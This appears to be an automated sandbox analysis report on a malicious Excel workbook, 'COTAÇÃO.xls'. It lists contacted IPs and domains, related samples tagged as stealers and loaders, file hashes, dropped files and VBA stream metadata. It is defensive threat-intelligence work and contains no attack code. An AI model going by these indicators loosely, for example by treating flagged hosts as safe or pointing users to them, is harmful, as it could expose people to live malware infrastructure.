                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, MavInject32.exe
                      • Excluded IPs from analysis (whitelisted): 52.109.76.240, 23.60.203.209, 52.109.76.243, 199.232.214.172, 13.89.178.26, 51.116.253.169, 23.199.214.10, 52.109.89.18, 20.189.173.12, 52.123.129.14, 20.190.160.5, 20.109.210.53, 2.23.227.215
                      • Excluded domains from analysis (whitelisted): onedscolprdgwc04.germanywestcentral.cloudapp.azure.com, onedscolprdwus11.westus.cloudapp.azure.com, slscr.update.microsoft.com, onedscolprdcus00.centralus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, config.officeapps.live.com, e16604.f.a
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      16:34:28API Interceptor867x Sleep call for process: splwow64.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3.39.89.152Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                        Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                            POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                              POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                840.xlsGet hashmaliciousUnknownBrowse
                                  POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                    POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                      13.107.246.67Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                        840.xlsGet hashmaliciousUnknownBrowse
                                          Royal Mail Inland Claim Form V1.3.xlsmGet hashmaliciousUnknownBrowse
                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                              desaremix.exeGet hashmaliciousKillMBRBrowse
                                                AccountFactuur8472.xlsmGet hashmaliciousKnowBe4Browse
                                                  RFQ-JC25-#595837.xlsxGet hashmaliciousUnknownBrowse
                                                    https://onedrive.live.com/redir?resid=5BFC62F3074C4120%21116&authkey=%21AOd_yBhC51KgUHc&page=View&wd=target%28Quick%20Notes.one%7C3c69d085-3af0-472e-a78d-4a68e797d5be%2FLOEB%7C8799eb25-cf12-4e70-a243-200cc3374b83%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                      Model - 2024 - Azure Model Template 3.26.xlsmGet hashmaliciousUnknownBrowse
                                                        https://wallet.airqon.aero/Get hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                          5.161.200.29Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                            Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                              Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                      221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                        221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s-0005.dual-s-msedge.netFW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msgGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.129.14
                                                                          FW Sensitive - ADMINISTRATIVE LICENSE REVOCATION (ALR) HEARING REQUEST.msgGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.129.14
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.129.14
                                                                          bg.microsoft.map.fastly.netOrder_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 199.232.210.172
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 199.232.214.172
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          Section_PE32_image_Aint13_Aint13_body.efi.dllGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          Fd-Employee-Handbook(1).pdfGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 199.232.214.172
                                                                          st3.proNouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          New Order.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSNouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.109.76.243
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.129.14
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 52.123.128.14
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 20.42.65.88
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          AMAZONEXPANSIONGBOrder_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.89.152
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 3.39.153.44
                                                                          AS-COLOCROSSINGUSNouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.28
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 198.12.89.24
                                                                          Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.235.28
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.227.228.22
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 198.23.187.151
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 198.23.187.151
                                                                          840.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.227.228.22
                                                                          https://dc1.convertc.com/event/v1/80401460/82362114/recentpurc/208463838.0153674575/6/cV9sU2Hc/B751BVZb/X.wgBlUMmEtoL7lLreHRS.dIbQhLbIKHVgjj1IvzEh_5AuOYVcDstYG0DCzEP9XO2LU-/click?url=https://gamma.app/docs/Sayer-Regan-Thayer-LLP-siiq7nvr7y2s7k4?mode=present#card-um3vy81gbcrpf02Get hashmaliciousUnknownBrowse
                                                                          • 192.210.233.190
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          6271f898ce5be7dd52b0fc260d0662b3Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          http://5148882780.sbsGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Emma Sparkes_cmrdpkuyjxetud.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 5.161.200.29
                                                                          • 3.39.89.152
                                                                          a0e9f5d64349fb13191bc781f81f42e1Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          No context
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):118
                                                                          Entropy (8bit):3.5700810731231707
                                                                          Encrypted:false
                                                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                          MD5:573220372DA4ED487441611079B623CD
                                                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):934
                                                                          Entropy (8bit):2.7129194926077287
                                                                          Encrypted:false
                                                                          SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
                                                                          MD5:AEA8676011F651E962233964C56EC078
                                                                          SHA1:48A16B5ED64B901BD474918730E8428101BCB382
                                                                          SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
                                                                          SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 20:34:41 2025, Security: 1
                                                                          Category:dropped
                                                                          Size (bytes):299008
                                                                          Entropy (8bit):7.952990371906305
                                                                          Encrypted:false
                                                                          SSDEEP:6144:rAg+46GPLjsSPmpBY1+QnZeGVGpfRdH5aPcv2DFjLm6tT5zpo8:rpx6GzjX+kRndVGpQU+DZVtk8
                                                                          MD5:10DBB8A8D37A8D113F5CB5EF5DA7C50E
                                                                          SHA1:4E741DA5A167AB1A83D5E1133D86384C73A46706
                                                                          SHA-256:5FF4127FE5F7A8F873DA5A2732090EC58521DCB4603D440C64B86E9B6D10F49A
                                                                          SHA-512:FC4374A0DE882C06319BF5A8CFFFA978E14E3272F29D0677F6998EC53AE545AECF44BE7C9D4BD939372C17171C2852FEA1F83DBFC3EA8B001D45A161F3B96513
                                                                          Malicious:false
                                                                          Preview:......................>.......................................................y.......{...............................................................................................................................................................................................................................................................................................................................................................................................................................................E.......................................................................................D...:....................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 20:34:41 2025, Security: 1
                                                                          Category:dropped
                                                                          Size (bytes):299008
                                                                          Entropy (8bit):7.952990371906305
                                                                          Encrypted:false
                                                                          SSDEEP:6144:rAg+46GPLjsSPmpBY1+QnZeGVGpfRdH5aPcv2DFjLm6tT5zpo8:rpx6GzjX+kRndVGpQU+DZVtk8
                                                                          MD5:10DBB8A8D37A8D113F5CB5EF5DA7C50E
                                                                          SHA1:4E741DA5A167AB1A83D5E1133D86384C73A46706
                                                                          SHA-256:5FF4127FE5F7A8F873DA5A2732090EC58521DCB4603D440C64B86E9B6D10F49A
                                                                          SHA-512:FC4374A0DE882C06319BF5A8CFFFA978E14E3272F29D0677F6998EC53AE545AECF44BE7C9D4BD939372C17171C2852FEA1F83DBFC3EA8B001D45A161F3B96513
                                                                          Malicious:true
                                                                          Preview:......................>.......................................................y.......{...............................................................................................................................................................................................................................................................................................................................................................................................................................................E.......................................................................................D...:....................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......
                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 13:36:05 2025, Security: 1
                                                                          Entropy (8bit):7.91074257209753
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                          File name:COTA#U00c7#U00c3O.xls
                                                                          File size:312'832 bytes
                                                                          MD5:3f6b0fddaa94e07440a3890afc3dc99c
                                                                          SHA1:2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
                                                                          SHA256:d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
                                                                          SHA512:e6fd8fd6b2084fac40a1251d11ab8d9f504842494cbf95ebeaca743d26cf93122a4388c53bb01e146397951eb4220edb4bccddd0699b72469f2527d4c4f281d2
                                                                          SSDEEP:6144:mzVjj7rqy5w5lp5AOnXVlUUPgZXTJDyOJ8+dAyNRNR+sQ:6jj7rquwnp5xXFSTJN9dAyFZQ
                                                                          TLSH:8264122C34E5EB1ED6874A784CC1E6CA61B2FC63BE51B33B3191F74E0C7A1A19143966
                                                                          File Content Preview:........................>.......................................................y.......{......................................................................................................................................................................
                                                                          Icon Hash:35ed8e920e8c81b5
                                                                          Document Type:OLE
                                                                          Number of OLE Files:1
                                                                          Has Summary Info:
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:True
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:False
                                                                          Flash Objects Count:0
                                                                          Contains VBA Macros:True
                                                                          Code Page:1252
                                                                          Author:
                                                                          Last Saved By:
                                                                          Create Time:2006-09-16 00:00:00
                                                                          Last Saved Time:2025-03-10 13:36:05
                                                                          Creating Application:Microsoft Excel
                                                                          Security:1
                                                                          Document Code Page:1252
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:786432
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                          VBA File Name:Sheet1.cls
                                                                          Stream Size:977
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { 2 F v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7b 32 46 76 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Attribute VB_Name = "Sheet1"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                          VBA File Name:Sheet2.cls
                                                                          Stream Size:977
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { 2 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7b 32 ee 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Attribute VB_Name = "Sheet2"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                          VBA File Name:Sheet3.cls
                                                                          Stream Size:977
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { 2 + . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
